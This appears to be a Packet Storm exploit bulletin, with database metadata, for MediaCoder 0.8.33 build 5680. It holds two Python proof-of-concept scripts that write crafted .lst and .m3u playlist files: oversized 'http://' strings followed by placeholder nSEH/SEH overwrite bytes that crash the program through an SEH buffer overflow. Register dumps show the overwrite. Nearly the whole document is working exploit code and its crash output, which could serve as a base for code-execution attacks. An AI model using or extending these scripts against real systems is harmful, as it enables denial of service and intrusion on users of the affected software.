ID PACKETSTORM:129629
Type packetstorm
Reporter Hadji Samir
Modified 2014-12-17T00:00:00
Description
`# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680
EAX 0012E788
ECX 43434343
EDX 00000000
EBX 43434343
ESP 0012E724
EBP 0012E774
ESI 0012E788
EDI 00000000
#!/usr/bin/python
buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh = ("C" * 4)
junk = ("D" * 60)
f= open("exploit.lst",'w')
f.write(buffer + nseh + seh + junk)
f.close()
-------------------
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680
EAX 0012E508
ECX 43434343
EDX 00000000
EBX 43434343
ESP 0012E4A4
EBP 0012E4F4
ESI 0012E508
EDI 00000000
#!/usr/bin/python
buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh = ("C" * 4)
junk = ("D" * 60)
f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + junk)
f.close()
`
{"id": "PACKETSTORM:129629", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Mediacoder 0.8.33 Build 5680 Buffer Overflow / DoS", "description": "", "published": "2014-12-17T00:00:00", "modified": "2014-12-17T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/129629/Mediacoder-0.8.33-Build-5680-Buffer-Overflow-DoS.html", "reporter": "Hadji Samir", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:29:30", "viewCount": 1, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2016-11-03T10:29:30", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:30", "rev": 2}, "vulnersScore": 1.0}, "sourceHref": "https://packetstormsecurity.com/files/download/129629/mediacoder0833-overflow.txt", "sourceData": "`# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst) \n# Date: 11/29/2010 \n# Author: Hadji Samir s-dz@hotmail.fr \n# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe \n# Version: 0.8.33 build 5680 \n \nEAX 0012E788 \nECX 43434343 \nEDX 00000000 \nEBX 43434343 \nESP 0012E724 \nEBP 0012E774 \nESI 0012E788 \nEDI 00000000 \n \n#!/usr/bin/python \n \nbuffer = (\"http://\" + \"A\" * 845) \nnseh = (\"B\" * 4) \nseh = (\"C\" * 4) \njunk = (\"D\" * 60) \n \nf= open(\"exploit.lst\",'w') \nf.write(buffer + nseh + seh + junk) \nf.close() \n \n------------------- \n# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u) \n# Date: 11/29/2010 \n# Author: Hadji Samir s-dz@hotmail.fr \n# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe \n# Version: 0.8.33 build 5680 \n \nEAX 0012E508 \nECX 43434343 \nEDX 00000000 \nEBX 43434343 \nESP 0012E4A4 \nEBP 0012E4F4 \nESI 0012E508 \nEDI 00000000 \n \n#!/usr/bin/python \nbuffer = (\"http://\" + \"A\" * 845) \nnseh = (\"B\" * 4) \nseh = (\"C\" * 4) \njunk = (\"D\" * 60) \n \nf= open(\"exploit.m3u\",'w') \nf.write(buffer + nseh + seh + junk) \nf.close() \n \n`\n", "immutableFields": []}
{}